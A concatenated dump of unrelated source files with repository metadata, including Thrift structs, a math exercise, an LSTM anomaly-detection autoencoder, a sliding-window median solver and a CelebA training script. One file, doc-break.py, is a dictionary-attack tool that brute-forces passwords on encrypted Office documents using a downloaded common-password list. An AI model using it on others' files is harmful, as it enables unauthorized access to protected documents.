    # Fast C path when the accelerated binary protocol + fastbinary are available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('ping_result')
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    return
  def __repr__(self):
    # dict.items() replaces the Python-2-only dict.iteritems() (works on 2 and 3).
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.items()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class startFullRecovery_args:
  """Thrift-generated argument struct for the startFullRecovery() RPC (no fields)."""
  thrift_spec = (
  )
  def read(self, iprot):
    # Fast C path when the accelerated binary protocol + fastbinary are available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('startFullRecovery_args')
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    return
  def __repr__(self):
    # dict.items() replaces the Python-2-only dict.iteritems() (works on 2 and 3).
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.items()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class startFullRecovery_result:
  """Thrift-generated result struct for the void startFullRecovery() RPC (no fields)."""
  thrift_spec = (
  )
  def read(self, iprot):
    # Fast C path when the accelerated binary protocol + fastbinary are available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('startFullRecovery_result')
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    return
  def __repr__(self):
    # dict.items() replaces the Python-2-only dict.iteritems() (works on 2 and 3).
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.items()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
| [
"adrian@ghosthack.com"
] | adrian@ghosthack.com |
716813bc48c41feec512bf5d75c9c1fef2654e12 | 0f9d7f7d57055228688cdac61f8b3d65b657994a | /task1.py | 1fcd46efc38ca5348df69253fedcda0a6eefadee | [] | no_license | alex-chugunov/LR1 | 7053d70df135abb382dc1f451cf2017e60a09b93 | a0f8f1e4d9474114834483ac4ae009068eeaff6a | refs/heads/master | 2022-12-23T17:47:44.579714 | 2020-09-20T08:24:14 | 2020-09-20T08:24:14 | 296,906,441 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 684 | py | import math as mt
# Task 19: constant expression, printed once at start.
expr19 = 124 / ((45 * 3 + 7) - 2 / 5)
print(expr19)


def compute_expr9(a, b, c, d, e, m, n, p):
    """Evaluate expression 9 for the given real parameters.

    Returns 2**n * (sin a + cos(b*c/d**m))**2 divided by
    (log10((a + b*c/d**m)**(1/3)) - e/2**p).

    Raises ValueError (math domain error, e.g. negative base of the cube
    root or log of a non-positive value), ZeroDivisionError (d == 0 with
    negative m, or a zero denominator) or OverflowError for invalid inputs.
    """
    # The sin/cos term appears in both factors of the numerator.
    inner = mt.sin(a) + mt.cos(b * c / mt.pow(d, m))
    ch1 = mt.pow(2, n) * inner
    ch2 = inner
    znm = mt.log10(mt.pow(a + b * c / mt.pow(d, m), 1 / 3)) - e / mt.pow(2, p)
    return ch1 * ch2 / znm


if __name__ == "__main__":
    # Prompt for the eight parameters; float() failures propagate, exactly
    # as in the original script where the conversions sat outside the try.
    a = float(input("Введите a: \n"))
    b = float(input("Введите b: \n"))
    c = float(input("Введите c: \n"))
    d = float(input("Введите d: \n"))
    e = float(input("Введите e: \n"))
    m = float(input("Введите m: \n"))
    n = float(input("Введите n: \n"))
    p = float(input("Введите p: \n"))
    try:
        # Catch only the math failures; a bare except: would hide real bugs.
        print(compute_expr9(a, b, c, d, e, m, n, p))
    except (ValueError, ZeroDivisionError, OverflowError):
        print("Ошибка!")
| [
"57045051+alex-chugunov@users.noreply.github.com"
] | 57045051+alex-chugunov@users.noreply.github.com |
3fd31d51426d4a90ef31e02a3b42f541f6e7c801 | fc528608295ec9f2accd7c3b9c0d16de07843ed6 | /legacy/LSTM_autoencoder.py | ac75e6f5374c9c81c0893f299745ed8be50979ac | [] | no_license | irijije/Thesis_Master | 77ae6c1899613ac1fd517dfcd21ea99401bdc6da | cc6cd583f311fc5b6d1cb75210eac3660945df52 | refs/heads/main | 2023-05-03T12:54:26.575975 | 2021-05-27T13:59:42 | 2021-05-27T13:59:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,813 | py | import os
import sys
import pandas as pd
import numpy as np
import tensorflow as tf
import matplotlib.pyplot as plt
from sklearn.preprocessing import StandardScaler
from sklearn.model_selection import train_test_split
from config import Config
from preprocess import show_tsne
# Pin this process to physical GPU #1 only; must be set before TensorFlow
# initializes CUDA (i.e. before any tf GPU call below).
os.environ["CUDA_VISIBLE_DEVICES"] = '1'
gpus = tf.config.experimental.list_physical_devices('GPU')
if gpus:
    try:
        # Cap TF memory on the first visible GPU at 8196 MB.
        # NOTE(review): 8196 looks like a typo for 8192 — confirm intended limit.
        tf.config.experimental.set_virtual_device_configuration(
            gpus[0],
            [tf.config.experimental.VirtualDeviceConfiguration(memory_limit=8196)])
    except RuntimeError as e:
        # Presumably raised when the GPU was already initialized; the script
        # just logs it and continues with default memory settings.
        print(e)
class LSTM(tf.keras.Model):
    """LSTM sequence autoencoder over (samples, timesteps, features) windows.

    Loads train/test arrays from Config.DATAPATH, standardizes features
    (scaler fit on train only), and trains an encoder/decoder pair to
    reconstruct input sequences. The reconstruction error is then used to
    separate the two label classes (plotted as "Normal" vs "Attack").
    """
    def __init__(self):
        super(LSTM, self).__init__()
        # Arrays are .npy dumps; assumed shape (samples, timesteps, features)
        # — TODO confirm against the preprocessing step.
        self.X_train, self.y_train = np.load(Config.DATAPATH+"data_train.npy"), np.load(Config.DATAPATH+"labels_train.npy")
        self.X_test, self.y_test = np.load(Config.DATAPATH+"data_test.npy"), np.load(Config.DATAPATH+"labels_test.npy")
        # Standardize per feature: flatten time into the batch axis, fit on
        # train, reuse the same scaler for test.
        scaler = StandardScaler()
        self.X_train = scaler.fit_transform(self.X_train.reshape(-1, self.X_train.shape[-1])).reshape(self.X_train.shape).astype('float32')
        self.X_test = scaler.transform(self.X_test.reshape(-1, self.X_test.shape[-1])).reshape(self.X_test.shape).astype('float32')
        # self.X_train = self.padding(self.X_train)
        # self.X_test = self.padding(self.X_test)
        # Encoder compresses each sequence into one 32-d vector, then repeats
        # it once per timestep to feed the sequence decoder.
        self.encoder = tf.keras.Sequential([
            tf.keras.layers.LSTM(32, activation='relu', input_shape=(self.X_train.shape[1], self.X_train.shape[2]), return_sequences=False),
            tf.keras.layers.RepeatVector(self.X_train.shape[1]),
        ])
        # Decoder maps the repeated latent back to the original feature width.
        self.decoder = tf.keras.Sequential([
            tf.keras.layers.LSTM(32, activation='relu', input_shape=(self.X_train.shape[1], 32), return_sequences=True),
            tf.keras.layers.TimeDistributed(tf.keras.layers.Dense(self.X_train.shape[2])),
        ])
        self.optimizer = tf.keras.optimizers.Adam()
    def compute_loss(self, x):
        # Mean squared reconstruction error of the encode/decode round trip.
        z = self.encoder(x)
        x_ = self.decoder(z)
        loss = tf.reduce_mean(tf.square(tf.abs(x - x_)))
        return loss
    @tf.function
    def train_step(self, x):
        # One gradient step over all encoder+decoder trainable variables.
        with tf.GradientTape() as tape:
            loss = self.compute_loss(x)
        gradients = tape.gradient(loss, self.trainable_variables)
        self.optimizer.apply_gradients(zip(gradients, self.trainable_variables))
        return loss
    def train(self, epochs=Config.EPOCHS):
        """Train for `epochs`, save encoder/decoder to models/, plot the loss.

        NOTE(review): rebinds self.X_train from an ndarray to a tf.data.Dataset,
        so train() cannot safely be called twice on the same instance, and
        test('train') afterwards would see a Dataset instead of an array.
        """
        self.X_train = tf.data.Dataset.from_tensor_slices(self.X_train).batch(Config.BATCH_SIZE)
        losses = []
        for epoch in range(epochs):
            print("epoch: {} training".format(epoch))
            for batch in self.X_train:
                #batch = self.padding(batch)
                loss = self.train_step(batch)
            # Only the last batch's loss of each epoch is logged/recorded.
            tf.print(loss)
            losses.append(loss.numpy())
        self.encoder.save('models/encoder.h5')
        self.decoder.save('models/decoder.h5')
        plt.plot(losses, linewidth=2, label='Train')
        plt.legend(loc='upper right')
        plt.title('Model loss')
        plt.ylabel('Loss')
        plt.xlabel('Epoch')
        plt.savefig("figures/lstm_loss.png")
        plt.show()
    def show_test(self):
        """Print input / latent / reconstruction for two test samples."""
        x = self.X_test[:2]
        self.encoder = tf.keras.models.load_model('models/encoder.h5')
        self.decoder = tf.keras.models.load_model('models/decoder.h5')
        z = self.encoder(x, training=False)
        x_ = self.decoder(z, training=False)
        print("\nx: {}".format(np.array2string(np.array(x[0]), prefix="x: ",
                            formatter={'float_kind':lambda x: "%7.4f" % x})))
        print("\nz: {}".format(np.array2string(np.array(z[0]), prefix="z: ",
                            formatter={'float_kind':lambda z: "%7.4f" % z})))
        print("\nx_: {}".format(np.array2string(np.array(x_[0]), prefix="x_: ",
                            formatter={'float_kind':lambda x: "%7.4f" % x})))
    def test(self, name='test'):
        """Encode a split, dump latents/labels, show t-SNE and the
        per-class reconstruction-error scatter plot.

        NOTE(review): the `name` parameter is shadowed by the groupby loop
        variable below (harmless here since np.save already ran, but fragile).
        Also rebinds self.X_train/self.X_test to Datasets as a side effect.
        """
        if name=='train':
            x = self.X_train
            self.X_train = tf.data.Dataset.from_tensor_slices(self.X_train).batch(Config.BATCH_SIZE)
            y = self.y_train
        else:
            x = self.X_test
            self.X_test = tf.data.Dataset.from_tensor_slices(self.X_test).batch(Config.BATCH_SIZE)
            y = self.y_test
        self.encoder = tf.keras.models.load_model('models/encoder.h5')
        self.decoder = tf.keras.models.load_model('models/decoder.h5')
        z = self.encoder(x, training=False).numpy()
        x_ = self.decoder(z, training=False).numpy()
        np.save(f"data/lstm/data_{name}", z)
        np.save(f"data/lstm/labels_{name}", y)
        show_tsne(z, y, 'lstm')
        # Per-sample MSE between the flattened input and reconstruction.
        mse = np.mean(np.power(x.reshape(x.shape[0], -1) - x_.reshape(x_.shape[0], -1), 2), axis=1)
        error_df = pd.DataFrame({'Reconstruction_error': mse,
                                'True_class': y})
        groups = error_df.groupby('True_class')
        _, ax = plt.subplots()
        for name, group in groups:
            ax.plot(group.index, group.Reconstruction_error, marker='o', ms=3.5, linestyle='',
                    label= "Attack" if name == 1 else "Normal")
        ax.legend()
        plt.title("Reconstruction error for different classes")
        plt.ylabel("Reconstruction error")
        plt.xlabel("Data point index")
        plt.savefig("figures/reconstruction_error.png")
        plt.show()
    def padding(self, X):
        """Expand each window into T left-padded copies (currently unused;
        the calls in __init__/train are commented out)."""
        T = int(Config.MAX_TIMESTEP/Config.UNIT_TIMESTEP)
        X_ = np.zeros((len(X)*T, Config.MAX_TIMESTEP, Config.N_FEATURES))
        for i, x in enumerate(X):
            for j in range(T):
                # Copy j+1 trailing unit-steps; the leading part stays zero.
                X_[i*T+j, T-j-1:] = x[T-j-1:]
        return X_.astype('float32')
if __name__ == "__main__":
    # Train the autoencoder from scratch; evaluation helpers are left
    # commented out and can be enabled after a trained model exists.
    lstm = LSTM()
    lstm.train()
    #lstm.test('train')
    #lstm.show_test()
| [
"wnsrud3611@gmail.com"
] | wnsrud3611@gmail.com |
ccf91ec29fce9d8bcf26eaf56f6445a4a54c28d3 | c1dd9d57da11ac57f0a2096204c3c781be34ef9d | /src/doc-break.py | f91534f3293e093125e1f1ad67e939328fdb30e2 | [
"MIT"
] | permissive | andreblue/doc-breaker | f70116ad1515691f6a5acd8fb424168510034311 | bf847a3b4e0a5effca718dc03c4cac418ccaed23 | refs/heads/master | 2020-05-16T00:55:17.190916 | 2019-04-22T00:44:12 | 2019-04-22T00:44:12 | 182,590,787 | 6 | 2 | null | null | null | null | UTF-8 | Python | false | false | 4,155 | py | import msoffcrypto
import sys, getopt
import os
import urllib.request
def download_PasswordList():
    """Download the SecLists 10k most-common password list into the CWD."""
    # List taken from https://github.com/danielmiessler/SecLists
    source = 'https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Common-Credentials/10-million-password-list-top-10000.txt'
    destination = "10000-password-top-list.txt"
    try:
        urllib.request.urlretrieve(source, destination)
    except Exception as err:
        # Report the failure and stop: nothing useful can run without the list.
        handleException(err)
        sys.exit()
def handleException(e):
    """Print a uniform one-line error message for a caught exception."""
    print(f"Error: {e}")
def breakFile(fileHandle, passwordStr):
    """Try passwordStr against the encrypted Office file.

    On success: prints the password, writes the decrypted document to
    decrypted_file.docx and terminates the whole process via sys.exit().

    NOTE(review): this function always returns None, so callers testing
    `if breakFile(...)` never see a truthy value — the loops in main() only
    stop because of the sys.exit() here.
    NOTE(review): identifying a wrong password by the exception's message
    text ('Key verification failed') is fragile across msoffcrypto versions
    — verify against the installed library.
    NOTE(review): the output file handle passed to decrypt() is never
    explicitly closed.
    """
    try:
        fileHandle.load_key(password=passwordStr)
    except Exception as e:
        # A wrong password is expected and silently ignored; anything else
        # is reported as a real error.
        if str(e) != 'Key verification failed':
            handleException(e)
    else:
        print ('Password FOUND!')
        print ('Saving document as decrypted_file.docx next to main script')
        print ('Password was: "' + passwordStr + '"')
        fileHandle.decrypt(open('decrypted_file.docx', "wb"))
        sys.exit()
def main(argv):
    """Parse CLI options and brute-force the target document's password.

    Options: -i <file> (required target), -c (use the bundled 10k common
    list, downloading it first if missing), -l <file> (custom password
    list), -v (verbose per-attempt progress), -h (help).

    NOTE(review): `found` below is assigned but never used, and the
    `if breakFile(...): break` checks never fire because breakFile() always
    returns None (success exits the process instead). The final "Could not
    find" message is therefore only reached on genuine failure.
    """
    inputfile = ''
    doCommonPasswordChecks = False
    verbose = False
    customList = False
    try:
        opts, args = getopt.getopt(argv,"hi:cvl:",["ifile=", "common", "verbose", "list="])
    except getopt.GetoptError:
        print ('doc-break.py -i <inputfile>')
        sys.exit(2)
    for opt, arg in opts:
        if opt == '-h':
            # Usage table, then exit.
            print ('doc-break.py -i <inputfile> -c -v -l <listfile>')
            print ('| -i   | Required | <input file> | Will use that file as the one to open   | Somefile.docx')
            print ('| -c   | Optional | None         | Use the 10000 common list               | ')
            print ('| -v   | Optional | None         | Will spam console with info             | ')
            print ('| -l   | Optional | <input file> | Will use the file as the password list  | Password.txt ')
            sys.exit()
        elif opt in ("-i", "--ifile"):
            inputfile = arg
        elif opt in ("-v", "--verbose"):
            verbose = True
        elif opt in ("-c", "--common"):
            doCommonPasswordChecks = True
        elif opt in ("-l", "--list"):
            customList = arg
    # Validate the target document before doing any work.
    if inputfile == '':
        print ('No file passed.')
        print ('doc-break.py -i <inputfile>')
        sys.exit()
    exists = os.path.isfile(inputfile)
    if not exists:
        print ('Failed to find file. Please check your file location: ')
        print (inputfile)
        sys.exit()
    # NOTE(review): this handle (and the lists below) are opened without
    # `with`, so they leak if an exception escapes.
    fh = msoffcrypto.OfficeFile(open(inputfile, "rb"))
    found = False
    if doCommonPasswordChecks:
        # Fetch the common-password list on first use.
        exists = os.path.isfile("10000-password-top-list.txt")
        if not exists:
            download_PasswordList()
        common_passwords = open('10000-password-top-list.txt')
        currentLine = 1
        print ("Checking against the 10000 common password list")
        for line in common_passwords:
            if verbose:
                print ('Trying "' + line.rstrip() + '"')
                print ( str(currentLine) + '/' + str(10000))
            if breakFile(fh, line.rstrip()):
                break
            currentLine = currentLine+1
        common_passwords.close()
    if customList:
        exists = os.path.isfile(customList)
        if not exists:
            print ('Could not find list "' + customList + '" Please check your file')
            sys.exit()
        password_list = open(customList)
        # First pass just counts the lines for the progress display.
        #this is ugly. I know
        linecount = 0
        for line in password_list:
            linecount = linecount+1
        password_list.close()
        password_list = open(customList)
        linecount = str(linecount)
        currentLine = 1
        for line in password_list:
            if verbose:
                print ('Trying "' + line.rstrip() + '"')
                print ( str(currentLine) + '/' + linecount)
            if breakFile(fh, line.rstrip()):
                break
            currentLine = currentLine+1
        password_list.close()
    print ('Could not find the password. Perhaps try a larger list')
if __name__ == "__main__":
    # Drop the script name; getopt only wants the options.
    main(sys.argv[1:])
| [
"andreblue2u@live.com"
] | andreblue2u@live.com |
f9856b6be880ab2550bdebc36c6b1103c01b7923 | 3cf5f15725ea0904d8ca0f212c2c42ad95397410 | /480/main.py | 20fe107202ce1d5b2d1ff2d3e3bbf789f54a45a9 | [] | no_license | zxch3n/Leetcode | e7cd26395630fc43852224d6b50d7c870b839fa6 | d5c2378979c2db6ab8f0a3eecd98737a2a974e53 | refs/heads/master | 2021-09-05T08:03:45.272515 | 2018-01-25T13:37:32 | 2018-01-25T13:37:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,639 | py | # -*- coding: utf-8 -*-
"""
@author: Rem
@contack: remch183@outlook.com
@time: 2017/02/21/ 21:39
"""
__author__ = "Rem"
class TreeNode():
    """Order-statistics BST node used by the sliding-window-median solver.

    Each node keeps subtree sizes on both sides (ln / rn) so the k-th
    smallest value can be found in O(height). `f` is the parent pointer.
    findKth/remove assume the requested value/rank exists in the tree.
    """
    def __init__(self, f, v):
        self.v = v      # value stored at this node
        self.f = f      # parent node (None for the root)
        self.l = None   # left child (values <= v)
        self.r = None   # right child (values > v)
        self.ln = 0     # number of nodes in the left subtree
        self.rn = 0     # number of nodes in the right subtree
    def __repr__(self):
        return str(self.v) + '{%s %s}' % (str(self.l), str(self.r))
    def findKth(self, k):
        """Return the k-th smallest value (1-based) in this subtree."""
        if self.ln == k - 1:
            return self.v
        if self.ln > k - 1:
            return self.l.findKth(k)
        return self.r.findKth(k - 1 - self.ln)
    def insert(self, v):
        """Insert v, updating subtree counts along the search path."""
        if v <= self.v:
            self.ln += 1
            if self.l is None:
                self.l = TreeNode(self, v)
            else:
                return self.l.insert(v)
        else:
            self.rn += 1
            if self.r is None:
                self.r = TreeNode(self, v)
            else:
                return self.r.insert(v)
    def popRightMost(self):
        """Detach and return the largest value in this subtree.

        BUGFIX: the original had a bare `self.r =` (SyntaxError), discarded
        the detached node's left subtree, and never decremented rn counters
        along the path; all three are fixed here.
        """
        if self.r:
            self.rn -= 1
            if not self.r.r:
                t = self.r.v
                # Splice out the rightmost node, promoting its left subtree.
                self.r = self.r.l
                if self.r:
                    self.r.f = self
                return t
            return self.r.popRightMost()
        # This node itself is the rightmost of the subtree remove() handed us:
        # detach it from its parent, promoting its left child.
        t = self.v
        self.f.l = self.l
        if self.l:
            self.l.f = self.f
        return t
    def popLeftMost(self):
        """Detach and return the smallest value in this subtree.

        Mirror image of popRightMost (same count/reattach fixes applied).
        """
        if self.l:
            self.ln -= 1
            if not self.l.l:
                t = self.l.v
                self.l = self.l.r
                if self.l:
                    self.l.f = self
                return t
            return self.l.popLeftMost()
        t = self.v
        self.f.r = self.r
        if self.r:
            self.r.f = self.f
        return t
    def remove(self, v):
        """Remove one occurrence of v (must exist; counts are decremented
        along the search path before the node is found)."""
        if self.v == v:
            if self.l:
                self.v = self.l.popRightMost()
                self.ln -= 1
            elif self.r:
                self.v = self.r.popLeftMost()
                self.rn -= 1
            else:
                # BUGFIX: leaf removal used to crash (self.r is None here);
                # detach this leaf from its parent instead.
                if self.f:
                    if self.f.l is self:
                        self.f.l = None
                    else:
                        self.f.r = None
            return
        if self.v > v:
            self.ln -= 1
            return self.l.remove(v)
        else:
            self.rn -= 1
            return self.r.remove(v)
    @staticmethod
    def findMedian(root, n):
        """Median of the n values in the tree (mean of the middle two when
        n is even)."""
        if n & 1:
            return root.findKth((n + 1) // 2)
        return (root.findKth(n // 2) + root.findKth(n // 2 + 1)) / 2
class Solution:
    def medianSlidingWindow(self, nums, k):
        """Return the median of every length-k sliding window of nums.

        Keeps an order-statistics BST (TreeNode) of the current window:
        slide by removing the outgoing element and inserting the incoming
        one. Leftover debug print(root) calls were removed.
        """
        root = TreeNode(None, nums[0])
        for i in range(1, k):
            root.insert(nums[i])
        ans = []
        for i in range(k, len(nums)):
            ans.append(TreeNode.findMedian(root, k))
            root.remove(nums[i - k])
            root.insert(nums[i])
        # Median of the final window.
        ans.append(TreeNode.findMedian(root, k))
        return ans
def test(*args):
    """Ad-hoc driver: solve one instance and print the medians."""
    solver = Solution()
    print(solver.medianSlidingWindow(*args))


test([1, 2, 3, 4, 5], 4)
| [
"remch183@outlook.com"
] | remch183@outlook.com |
08538abd543b41ee4eecc902a9b4ea375ebe66a3 | d971220d09d0c3c9866c1f1d98b85295e00ac2af | /painting_spliter.py | 03d23ae1c58eaa56151d908b7dfc0ecb43d5d6f7 | [] | no_license | j0sephmerheb/python_art_gallery | a716a22f0d82d73502d458d4c5d1c003618589bc | 51521ae7fb59ac3b5385bcf6e5310b95304114d0 | refs/heads/master | 2022-08-03T10:38:17.774192 | 2020-05-22T09:38:15 | 2020-05-22T09:38:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,715 | py |
# coding: utf-8
# ### Students: Anh Tu NGUYEN - Joseph MERHEB - Sita SHRESTHA
# In[13]:
class Reader:
    """Parses a painting-description file and builds frameglasses.

    The input's first line is a count header; every following line is
    "<type> <tag-count> <tags...>" where type is 'L' (landscape) or 'P'
    (portrait). Each line is prefixed with its 0-based painting id.
    """

    def __init__(self, input_file):
        """Read input_file (skipping the header) into id-prefixed lines."""
        self.input_file = input_file
        self.portrait_list = ''
        self.landscape_list = ''
        self.new_text = ''
        # BUGFIX/robustness: use `with` so the handle is closed even on error.
        with open(input_file, "r") as file:
            lines = file.readlines()[1:]
        # Lines keep their trailing newlines, exactly as readlines() yields them.
        self.new_text = ''.join(str(i) + ' ' + line for i, line in enumerate(lines))

    def paint_split(self):
        """Partition the id-prefixed lines by orientation.

        Returns all landscape lines followed by all portrait lines (each
        newline-terminated). Note: calling this twice doubles the stored
        lists, same as the original behavior.
        """
        for line in self.new_text.splitlines():
            p_type = line.split(' ')[1]
            if p_type == 'P':
                self.portrait_list += line + '\n'
            elif p_type == 'L':
                self.landscape_list += line + '\n'
        return self.landscape_list + self.portrait_list

    def portrait_combiner(self):
        """Build frameglasses: one per landscape, one per portrait pair
        (i-th paired with the i-th from the end; a middle leftover portrait
        when the count is odd is dropped, as before). Writes the result to
        simple_file.txt and returns it.
        """
        p_list = self.portrait_list.splitlines()
        result = ''
        for line in self.landscape_list.splitlines():
            parts = line.split(' ')
            # Line layout: "<id> L <tag-count> <tags...>".
            # BUGFIX: the old per-tag loop emitted the newline as soon as a tag
            # *equaled* the last tag, truncating lines with duplicate tags;
            # ' '.join always emits every tag.
            result += parts[0] + ' ' + ' '.join(parts[3:]) + '\n'
        for i in range(len(p_list) // 2):
            first = p_list[i].split(' ')
            last = p_list[len(p_list) - 1 - i].split(' ')
            # Union of both portraits' tags (order is set-dependent, as before).
            tag_list = list(set(first[3:]) | set(last[3:]))
            result += first[0] + ',' + last[0] + ' ' + ' '.join(tag_list) + '\n'
        with open("simple_file.txt", "w") as out:
            out.write(result)
        return result
# Other method for ordering the frameglasses
# def order_frame(self):
# full_list = self.portrait_combiner();
# frame_score_dict = {}
# frame_list = full_list.splitlines();
# completed_frame_dict = {};
# used_frame_list = [];
# for i in range(0,len(frame_list)):
# if (i<len(frame_list)-1):
# f1_id = frame_list[i].split(' ')[0];
# f1_tags = frame_list[i].split(' ')[1:];
# for j in range(i+1,len(frame_list)):
# f2_id = frame_list[j].split(' ')[0];
# f2_tags = frame_list[j].split(' ')[1:];
# common_tags = len(set(f1_tags) & set(f2_tags));
# f1_tag_only = len(set(f1_tags) - set(f2_tags));
# f2_tag_only = len(set(f2_tags) - set(f1_tags));
# frame_score = min(common_tags, f1_tag_only, f2_tag_only);
# frame_score_dict[f1_id + '-' + f2_id] = frame_score;
# max_score_frame = max(frame_score_dict, key=frame_score_dict.get);
# max_score = max(frame_score_dict.values());
# completed_frame_dict[max_score_frame] = max_score;
# for frame in max_score_frame.split('-'):
# if ',' in frame:
# for f in frame.split(','):
# if f not in used_frame_list:
# used_frame_list.append(f);
# else:
# if frame not in used_frame_list:
# used_frame_list.append(frame);
# frame_score_dict.clear();
# output = '';
# for key in completed_frame_dict.keys():
# for k in key.split('-'):
# if ',' in k:
# k = k.replace(',',' ')
# if k not in output:
# output += k + '\n'
# else:
# if k not in output:
# output += str(k) + '\n'
# output = str(output.count('\n')) + '\n' + output
# # print(output)
# file = open("output_" + self.input_file, "w")
# file.write(output);
# file.close();
# In[15]:
import argparse
def main():
    """CLI entry point: parse the input path and emit simple_file.txt."""
    cli = argparse.ArgumentParser()
    cli.add_argument("input", type=str)
    options = cli.parse_args()
    gallery = Reader(options.input)
    gallery.paint_split()
    gallery.portrait_combiner()
    # gallery.order_frame();


if __name__ == "__main__":
    main()
# reader = Reader("../0_example.txt");
# reader.paint_split();
# reader.order_frame();
# print(reader.portrait_list);
# print(reader.portrait_combiner());
| [
"joseph@merheb.net"
] | joseph@merheb.net |
fc634bba5340c74cb6a09b7f1f12da4e18979c57 | f2772c7e8f74d521d839c75a02d27f1a9457e695 | /main.py | 23fb379db5d8ddf2f1d2f324715f48ddfb953577 | [
"MIT"
] | permissive | sodaprairie0x0/Celeba-attributes-prediction | 6f8bfd87539f38189e8029709ec8dea5614f091d | c97fdf2c926eab137e7b6938659a877d3b7dc3f5 | refs/heads/main | 2022-12-31T11:26:59.996240 | 2020-10-21T08:06:19 | 2020-10-21T08:06:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,695 | py | import os
import argparse
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import numpy as np
import torchvision
from torchvision import datasets, models, transforms
import time
import os
import copy
from random import randint
from celeba import CelebA
from utils import *
from loss import FocalLoss
args = parser()
def main():
    """End-to-end driver: load data, build the model, train/validate, then test.

    Behaviour is controlled entirely by the global ``args`` namespace
    (resume, loss, lr, train_conv, test_mode, ...).
    """
    print('model settings:\n', args)
    device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
    print('training with device:', device)
    # 1. load the datasets
    train_loader, val_loader, test_loader = dataloaders()
    # show number of positive attributes per split
    print(positive_attributes(train_loader.dataset))
    print(positive_attributes(val_loader.dataset))
    print(positive_attributes(test_loader.dataset))
    # 2. retrieve the pretrained model
    model = load_model()
    # if resume is true, load the previously saved checkpoint
    if args.resume:
        print('resume from last checkpoint')
        state_dict = torch.load(args.root + 'checkpoints/' + args.checkpoint)
        model.load_state_dict(state_dict)
    model.to(device)
    # freeze conv-layer parameters when args.train_conv is false,
    # otherwise leave everything trainable
    for params in model.parameters():
        params.requires_grad = args.train_conv
    if args.train_conv:
        parameters = model.parameters()
    else:
        parameters = model.fc.parameters()
    # 3. choose the loss; fail fast on an unknown choice instead of hitting
    # an UnboundLocalError on `criterion` further down (bug in the original)
    if args.loss == 'bce':
        criterion = nn.BCEWithLogitsLoss()
    elif args.loss == 'focal':
        # alpha=1 means no emphasis on 0 or 1; smaller gamma means less
        # emphasis on minor probabilities
        criterion = FocalLoss(alpha=args.alpha, gamma=args.gamma)
    else:
        raise ValueError('unknown loss: {}'.format(args.loss))
    optimizer = optim.SGD(parameters, lr=args.lr, momentum=0.9)
    scheduler = optim.lr_scheduler.StepLR(optimizer, step_size=3, gamma=0.5)
    print('model training starts:')
    # 4. either evaluate only, or train then evaluate on the test set
    if args.test_mode:
        test(model, test_loader, criterion, device)
    else:
        model = train_validate(model, criterion, optimizer, scheduler,
                               train_loader, val_loader, device)
        test(model, test_loader, criterion, device)
def train_validate(model, criterion, optimizer, scheduler, train_loader, val_loader, device, validate=True):
    """Train ``model`` for ``args.epoches`` epochs, optionally validating each epoch.

    Keeps the weights with the best validation accuracy (saved to the
    checkpoint path) and early-stops if validation accuracy drops more than
    1% below the best seen so far.  Returns the model loaded with the best
    weights (or the initial weights when ``validate`` is False).
    """
